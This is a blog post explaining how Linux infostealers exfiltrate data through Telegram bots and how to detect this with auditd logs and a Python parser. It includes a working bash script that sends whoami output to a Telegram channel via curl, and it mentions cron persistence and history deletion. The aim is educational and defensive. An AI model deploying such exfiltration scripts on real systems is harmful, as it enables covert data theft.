DEV Community

Paula

Linux Exfiltration

One of the most prominent threats right now is infostealers: malware that captures information from a device and sends the stolen data to an attacker. While this technique is often a component of other attacks (e.g. ransomware), it also works on its own, for resale, cyber espionage and more.

In the past months, one of the most popular exfiltration methods has been Telegram or Discord bots (also used for command and control, C2).

I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!

Telegram bot

In order to do this, a Telegram bot and a channel are required. You create the bot with the help of BotFather, then create a channel and add the bot to it. Send a message to the channel and then use the following to get the channel info:

https://api.telegram.org/bot<BotToken>/getUpdates

As described here, this will give you the channel ID. Once you know the channel ID, you can send a message using:

curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'

Understanding this, we could create a script that enumerates system information and sends a message describing it. Let's create a really simple example that just sends the whoami output, for the sake of illustration. Of course, a real sample could include far more, such as architecture, disk info and so on. Most of these kinds of samples will also attempt to check for crypto wallet info.

Anyway, let's say we have the following script:

#!/bin/bash

# Enumerate something trivial (the current user) and send it to the channel
messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"

# Quote the URL so the shell does not word-split or glob-expand it
curl "$mycommand"


When this is executed, the username is sent to the channel.

(Screenshot: the username popping up in the channel)

Now, most of these will install the script in cron using crontab and delete the history log.

In case the crontab log is still intact, we will be able to see the crontab edit using cat /var/log/syslog | grep -w 'crontab'. But let's explore a cooler option: auditd.

Installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!

Now, if we use sudo cat /var/log/audit/audit.log | grep telegram | grep api, we will be able to see the attempt made by our script!
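As an added example (not part of the original post), here is a small Python parser for auditd EXECVE records that does what the grep above does, but also decodes hex-encoded arguments: auditd hex-encodes any execve argument containing a space, so a cron entry run as sh -c "curl https://api.telegram.org/..." is invisible to a plain grep. The Discord webhook path and the sample records are constructed assumptions, not captured data.

```python
import re

# Destinations the post discusses: Telegram's bot API and Discord bots/webhooks.
# The Discord path is an assumed pattern, not taken from the post.
SUSPICIOUS_HOSTS = ("api.telegram.org", "discord.com/api/webhooks")

# Each execve argument appears as aN="..." (readable) or aN=HEX (hex-encoded when the
# value contains a space, a double quote or a control character).
ARG_RE = re.compile(r'(?:^|\s)a(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
EVENT_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")

def parse_execve(line):
    """Return argv for one EXECVE record (hex args decoded), or None for other record types."""
    if "type=EXECVE" not in line:
        return None
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        args[int(idx)] = quoted if hexed == "" else bytes.fromhex(hexed).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def find_exfil(audit_text):
    """Flag EXECVE events whose decoded argv mentions one of the suspicious destinations."""
    hits = []
    for line in audit_text.splitlines():
        argv = parse_execve(line)
        if not argv:
            continue
        joined = " ".join(argv)
        host = next((h for h in SUSPICIOUS_HOSTS if h in joined), None)
        if host:
            hits.append({"event": EVENT_RE.search(line).group(1), "host": host, "argv": argv})
    return hits

# Constructed sample records, not captured from a real system; TOKEN/CHAT values are placeholders.
_CRON_CMD = "curl https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage?chat_id=CHAT_PLACEHOLDER&text=paula"
SAMPLE_AUDIT_LOG = "\n".join([
    'type=EXECVE msg=audit(1700000000.101:301): argc=1 a0="whoami"',
    'type=EXECVE msg=audit(1700000000.102:302): argc=2 a0="curl" a1="https://api.telegram.org/botTOKEN_PLACEHOLDER/sendMessage?chat_id=CHAT_PLACEHOLDER&text=paula"',
    # the whole command string contains spaces, so auditd writes it hex-encoded
    'type=EXECVE msg=audit(1700000000.103:303): argc=3 a0="/bin/sh" a1="-c" a2=' + _CRON_CMD.encode().hex().upper(),
    'type=EXECVE msg=audit(1700000000.104:304): argc=3 a0="ls" a1="-la" a2="/tmp"',
])

if __name__ == "__main__":
    for hit in find_exfil(SAMPLE_AUDIT_LOG):
        print(hit["event"], hit["host"], hit["argv"])
```

Running it against the real file (sudo python3 parser.py < /var/log/audit/audit.log, after swapping SAMPLE_AUDIT_LOG for stdin) flags events 302 and 303, while grep telegram only ever finds 302.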


Sometimes these attacks include tampering with /var/log, so keeping a backup of the logs in a different path could be useful, too.

Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )

If you are curious about analyzing real-life samples, take a look at my older posts about setting up a custom Linux honeypot. Most of the things I capture are miners, which share some characteristics with infostealers (messing with cron for persistence, attempting enumeration, attempting dynamic linker hijacking, and more).


Top comments (2)

Juan Julián Merelo Guervós

The exfiltrator stores their API key in plain text? Or is that encrypted somehow?

nigel447

time well spent reading this ++
